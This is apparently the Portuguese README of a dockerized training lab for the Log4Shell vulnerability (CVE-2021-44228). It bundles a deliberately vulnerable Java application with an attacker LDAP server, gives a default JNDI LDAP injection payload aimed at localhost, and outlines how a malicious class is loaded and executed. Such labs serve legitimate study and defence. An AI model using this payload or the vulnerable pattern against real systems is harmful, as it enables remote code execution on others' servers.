CVE-2021-44228 (Log4Shell) Ambiente de Laboratório de Vulnerabilidade
Introdução
Este projeto fornece um ambiente dockerizado para praticar com segurança e entender a vulnerabilidade crítica do Log4j conhecida como CVE-2021-44228 (Log4Shell).
Principais Recursos
- Ambiente de teste dockerizado e seguro
- Capacidade de teste de payload personalizado
- Inclui o servidor LDAP do atacante e uma aplicação Java vulnerável
Começando
docker compose up --build
Teste de Payload
- Você pode modificar o payload na seção de teste de
/vulnerable/Makefile
- O payload padrão usa
$${jndi:ldap://127.0.0.1:10000/}
Como Funciona
- A aplicação Java vulnerável é iniciada
- O servidor LDAP do atacante escuta na porta 10000
- A aplicação vulnerável executa
- O payload Log4Shell é registrado nos logs da aplicação vulnerável por meio da seção de teste do Makefile
- A aplicação vulnerável tenta uma consulta JNDI LDAP
- O servidor LDAP retorna uma classe Java maliciosa
- A aplicação vulnerável carrega e executa essa classe